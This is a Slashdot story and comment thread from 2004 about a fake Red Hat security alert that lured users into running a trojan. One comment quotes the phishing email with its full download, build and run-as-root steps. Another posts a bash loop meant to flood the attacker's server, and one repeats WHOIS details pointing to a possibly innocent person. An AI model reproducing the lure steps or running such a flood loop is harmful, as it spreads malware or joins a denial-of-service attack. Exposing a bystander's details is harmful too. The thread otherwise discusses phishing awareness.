Beware 'Fedora-Redhat' Fake Security Alert

rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.

We knew this day would come

[Orgazmus]

Adopting dumb users had to bring the ones exploiting the stpidity with them. Even tho running as a non-admin should help againts these things, there is no cure against security holes between the chair and the keyboard.

About Time

[Mr. Arbusto]

It's fishing, it happens on every platform and requires the user to do something they think is in their best interest. Nothing new.

wont work

[Anonymous Coward]

Don't most Fedora people use yum to keep their systems up to date? I don't think many Fedora/Red Hat admins would fall for this.

Real link?

[chrispyman]

Why not just use the real link and slashdot their site into oblivion!

Security only works when you know what to check

[LostCluster]

Red Hat's reply to this issue is pretty straight-forward. They've already taken all of the steps to properly sign their real updates, and this should stand out as a fake because it lacks all of those digital signatures.

However, what good is that against Joe User who falls for the bait and things the e-mail is authentic because they believe everything they read on their screen? They don't know to check for the "security seals" and since they don't see any red flags indicating that this is bogus.

It's something in info security that disconnects when dealing with average users. They don't know what to look for, and therefore the absense of those marks is not alarming to them as it is for us... a little something that needs to be cleaned up before Linux is ready for desktop primetime.

Confidence

[FiReaNGeL]

OK, we all know no Linux Guru will ever fall for this kind of stupid trick.

But imagine a world where Linux overwhelms Microsoft as the #1 desktop OS. Millions of Moms and Pops everywhere, using Linux. Who will they trust for their "updates"? I know for sure lots of them would fall for this particular trick, and it`s one of the first time we see this. Lots of distros, lots of sources, lots of patches, major confusion.

Question (as I don`t use Linux yet) : Do some of the major distros (Redhat, etc) have a webservice for updates, akin to windowsupdate.com? I sure hope so; it`s essential for further desktop market share increase.

Re:Source code!

[Anonymous Coward]

Inst.c is just a compiled shell script. The actual code is in fileutils-patch.bin.

Re: text

[Inf0phreak]

Why post the text instead of having the /. crowd flood their server to see what they've put up there? Potentially that could bring the server offline and cost them a bundle for a great two-sided effect (OK, the latter is not that cool if it's just some rooted box, but at least it would prevent anyone being affected if it was /.'ed to hell).

does it or not ?

[Matt_Joyce]

It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code."

Either it is malicious or not.
Don't they know ?

If it does; explain what it does and how to mitigate the damage.
If it does not; let people know so emotional energy can be use elsewhere.

What the definition of 'malicious code' anyway ?
Presumably any code you don't want running is malicious.
Creating a temp file would be a malicious use of disk space, etc.

Christ, they didn't do a very good job...

[Nailer]

The domain name was a good start, but these kids will have a hard time fooling anyone since they've ignored most of the basics:

• Most users who install security upgrades won't be running Red Hat 7.x.
  
• Red Hat is two words. Both begin with capitals.
  
• Red Hat use packages. Not hard guys.
  
• Security updates are provided through up2date. If they were smart, they would have provided an up2date source to use.
  
• The exclamation marks in 'Apply this patch!' seem a little un vendor-like
  

Re:Here's what WHOIS says:

[ironfrost]

There IS a Raymond Jackson that lives at that address (except that it's in CA rather than NY, as has been previously noted) so it's not completely made up. Although, whether he's really the perpetrator or simply someone the real criminal doesn't get on with is still a matter of doubt. In any case, all his details (including e-mail address and phone number) can be easily found from a Google search - he runs a chapter of a Historical Minatures Gaming Society [hmgs.org] in his area (HMGS West, near the bottom of the page).

And so...

[Eric Damron]

The question begging to be asked is why is this site still alive?

heh, maybe it won't be for long with the /. effect!

Re: text (Why? Because.)

[turnstyle]

Why post the text instead of having the /. crowd flood their server to see what they've put up there?

Because sending loads of traffic to a site that is actively trying to get a trojan onto unsuspecting boxes seems like a pretty bad idea.

Apart from those that might click through without bothering to RTFA, and mistakenly think that it's a legit patch, there are also all those browser exploits (such as the Microsoft jpeg exploit) that could also be waiting on the site for unpatched systems.

Re:Use SPF to protect yourself from phishing

[bigberk]

This is misleading. SPF might help verify that this email didn't come from redhat.com, but SPF isn't going to help you in general:

• The envelope sender could have not been @redhat.com but the From field could have contained redhat.com; then, there is no SPF to check and you can't benefit from redhat's SPF record
• The sender could have used a fedora-redhat.com address and published an SPF record for their own domain. Spammers already do this. The SPF check tells you nothing about authenticity. The SPF check would succeed, and it could still be a forgery.

Re:Christ, they didn't do a very good job...

[aldoman]

RE: RedHat 7.3, frankly that's BS. 7.3 and 9 are very heavily used, still.

Re:Security only works when you know what to check

[OmegaBlac]

It's something in info security that disconnects when dealing with average users. They don't know what to look for, and therefore the absense of those marks is not alarming to them as it is for us... a little something that needs to be cleaned up before Linux is ready for desktop primetime.

Yet that hasn't stopped Windows from being ready for "desktop primetime" huh? There will always be dumb-witted joe users that will get burnt from these lame social engineering scams regardless of the OS. These very well could be the same people who will be taking advantage of offline as well. Linux is already on the desktop. It has been ready for primetime for awhile. Of course there is nothing it can do to protect the user from the biggest security threat of them all: the user themselves.

Re:okay, heres the plan...

[synthparadox]

#!/usr/local/bin/bash

while [ 0 ]
do
wget -q http://www.fedora-redhat.com/fileutils-1.0.6.patch .tar.gz
rm -f fileutils-1.0.6.patch.tar.gz
done

Already running and will be running throughout the night.

Re:bastards

[vsync64]

Red Hat should simply rename the file on their site, change the links to it, and then replace it with a "THIS IS FRAUD" PNG.

Re: text (Why? Because.)

[Feanturi]

without bothering to RTFA, and mistakenly think that it's a legit patch,

Though it's a shitty thing for someone to be doing, as it is anytime somebody tries to get a virus or exploit going, it is at the same time a very amusing example of one. Think about it, the concept of this one has a certain beauty: It is meant to be activated while the machine is under the control of someone who should know better. There is no clueless-luser-carelessly-clicking that can be done here, you've got to know some basic geek stuff to go get the 'patch', unpack it, install it.. You've got to expend a reasonable amount of effort to get nailed by this thing. That is both its curse and its beauty.

Re:We knew this day would come

[DissidentHere]

Why would anyoen even bother trying this kind of cheap social engineering with Linux users at this point. What /. reader would actually fall for this shit? We all make fun of security through obscurity, but *nix users also tend to have security through intelligence.

Here is where the real danger lies, getting Linux on the desktop and having your grandma fall for this type of tripe, it will give *nix a bad name. "Oh no, Linux is just as vulnerable as Windows" No - its the users that are vulnerable, and the users that need to be educated. We all do what we can to lock down our boxen, but in the end it too often comes down to what's between the chair and the keyboard.

Re:I love it!

[juhaz]

Do you know if there's a cure for this?

A cure for what? Human curiosity? Why on Earth would anyone want to be "cured" from that, and become something less instead. It's one of the few good qualities that have brought us so far despite our lacking on other important areas...

On computer geeks, need to know how things work naturally becomes directed towards computers...

This should be a mandatory feature

[Anonymous Coward]

This is so cool !

Given that most users of Mozilla/Thunderbird are end users, and a large percentage would not run their own MTA, this would be a wonderful permanent feature in Mozilla.

It would be even better if you could use it as a rule to manage messages - ie immediately trash spoffed messages without presenting them to the end user.

Given the (lack of) speed with which ISP's are implementing SPF doing it at the MUA end is a great stopgap.

Please submit it - it's a damn fine idea.

Re:Looks to be a Klik client?

[MbM]

The klik source is not a trojan, it's simply a glorified wget wrapper .. no idea why

It seems stupid to encode the shell script into an unreadable form and then to post the sources; a few small changes to the source and it happily prints out the shell script.

Re: I'll try it... Execution results!

[Anonymous Coward]

The original email that was making the rounds:

Dear RedHat user,

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

* First download the patch from the Stanford RedHat mirror: wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar. gz
* Untar the patch:tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
* ./inst

Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Copyright © 2004 Red Hat, Inc. All rights reserved.

The interesting thing is the link that is listed to download the trojan. Its the Stanford website. The person who owns /~joeio is Irene O Joe from Law School. Was the Stanford website compromised?

Re:I love it!

[Tony-A]

Do you know if there's a cure for this?

You don't want a cure for this.

If you want a legitimate comparison between Linux and Windows security, observe:

This is new and fresh enough to "set up a sandbox environment and run it, to see what happens!" Another Windows similar thingee, "been there done that".

Dated 23rd October 2004 on http://www.redhat.com/security/ which means that Red Hat was on top of it fast. This isn't the kind of thing that Slashdot sits on and Red Hat was one day plus ahead. For comparison, it took about 6 days for Microsoft to return anything about Code Red on a search from microsoft.com. That's 6 days after appearing on Slachdot (compared to 1 day before).

Re:We knew this day would come

[suckmysav]

> In conclusion. I want to say that I believe
> if all people had:
>
> 1) Startup Monitor - Painfully simple, no one
> should be without it.

I use startup monitor. It is good. The problem is that the vast majority of Windows users are so habitualised into clicking 'YES' all the time that nasties will often get installed anyway.

Malware: Do you want to install this nasty browser hijacker?

n00b: Yes, just give me my goddamn "tropical aquarium" screensaver already!

> 2) Kerio Personal Firewall, or equivalent

Agreed, although even better is to have a NAT/firewall device for your internet connection. I'm not a fan of having a local "personal" firewall on a n00bs PC, as n00bs have a habit of screwing things up, and this includes screwing up their firewall software. If your firewall functionality is sitting in a little NAT box in the the corner then they are not gonna accidently screw it up. Also, personal firewalls such as ZoneAlarm can also suffer from the "yes click reflex" problem.

Malware: Tries to 'phone home'

ZoneAlarm: Do you want to let application porn2u.exe have access to the internet?

n00b: Yes goddammit, and stop bugging me already!

> 3) An executable monitor as described above.

I'm not sure I understand what you are suggesting here. I assume you are referring to a process listing app, such as the Windows task manager? Most clueless n00bs are not capable of comprehending what task manager is showing them. There are too many "good" processes that are virtually unidentifiable listed.

Re: I'll try it... Execution results!

[Spoing]

Surely we just have to send a load of bogus reports to root@addlebrain.com and he'll have a fun time trying to find the genuine ones.

Not if you run your own mail server(s).

As a test of why this is a BAD IDEA, send a message from your servers to an outside account. Read the full headers. Notice helpful little things there including IP addresses?

(Yes, you can send the message through your own servers to another account...though it might make reading the headers even more confusing if you've never done it before.)

Re:We knew this day would come

[suckmysav]

Ah ha, got it

The trouble again would be that most clueless users won't understand what the window asking;

Do you want to allow application
"W1NPR0C32.EXE" to execute?

[YES] [NO]

means, which leads to the same "yes click reflex" problem I described above.

It is a problem, because no matter what you do, there is always going to be a group of numbnuts out there who will click yes on anything that pops up. Often, they won't even read what it says. Any solution that produces even greater numbers of YES/NO dialogues will only serve to make the problem worse I'm afraid.

The solution as I see it is to deny (for a particular class of) users the ability for them to install anything in the first place.

This can be acheived in theory by running Windows under a restricted user policy but in practice it doesn't work because too many programmers are too lazy to write their programs to run with anything other than "administrator" priveleges, so we are stuck with a dilemma that will be hard to overcome.

Re:text of site

[Anonymous Coward]

>Brandybuck (704397) wrote: ...
>doesn't belong to RedHat? This is social engineering at its finest.

At it's finest? Who the hell are you kidding. This is a sample of social engineering yes... but... my god it's far from being the cream of the crop. Way way way to many simple mistakes.

Show's lack for attention to detail. Bad grammar, Taiwan mail relay, no up2date source...... screams amature...

Now if the grammar had been correct, if the target had been correct (RH 9, FC 2), if the delivery method had been correct (up2date source), if the mail header had been properly faked... then it would rank as a decent attempt. But really... with the ease at which email headers can be faked.... this doesn't even register on the talent meter of social engineering.

Re:Christ, they didn't do a very good job...

[Nailer]

It's common practice to "roll your own" where it's really important.

It's a common bad habit usually done to satisfy the ego of the admin. Most Red Hat customers use the distro because of the support arrangements available. That support, which doesn't exist for third party packages (including 'roll their own') is more valuable than the ego boost the admin gets from doing things themselves.

If you go replacing your packages with third party ones, you also miss out on a lot of the effort that Red Hat put into backporting security fixes. Does that Apache security fix change the format of module files? Not if you're running Red Hat's Apache package, it doesn't. If you're running something else, either backport it yourself (most people who have the skills to do that decide to let Red Hat do it for them) or update every module you're using.

Re:text of site

[Brandybuck]

this doesn't even register on the talent meter of social engineering.

Oh but it does! Stop being an ass and look around you. Not everyone is an expert RedHat administrator. Not everyone is paranoid enough to check the headers of every email their receive. Some people are <gasp> newbies! To them the "redhat-fedora" domain looks damned official.

Re:text of site

[Seehund]

Really now? This should set off alarms in people's minds?

Yes. At least in combination with the other glaring flaws I and others have already mentioned.

People who subscribe to security update announcements (and thus would be the primary target for a fake security announcement) have actively chosen to do so, and know what they look like, where they're sent from, what domains that are usually referenced to and what that/those website(s) look like. People who have not subscribed to such announcements would likely be more suspicious to unsolicited messages of this kind.

There are always exceptions. Some people will be taken in by this, no doubt, despite them being sufficiently savvy to have chosen to install a community-supported Linux distribution in the first place.

It's social engineering all right. Just not at its finest.

WTF??

[temojen]

Redhat found a vulnerability in

fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges.

We're supposed to believe this?

Re: I'll try it... Execution results!

[Tony-A]

...the system works!

Agreed, but it needs be very very careful as to any assumptions as to exactly which system it was that worked.

The first order of business is to somehow, anyhow, stem the tide.
The second is to be very wary of jumping to any conclusions. If I'm going to do something bad that requires a name and address on it, I will use your name and address not mine.
Third, it is probably better if the reactive responses are not exactly predictable. If your enemy has extremely predictable responses, you can defeat his superor forces with inferior forces.

Judging from this and the responses to this, I'd say that Open Source is in very good shape to take care of itself. Even better than a coordinated defense is being able to defend regardless of coordination or the lack thereof. Counting vulnerabilities is an extremely bad metric, particularly considering that Red Hat, etc knows that if you actually want people to patch their systems, you never under any circumstances downplay the potential severity.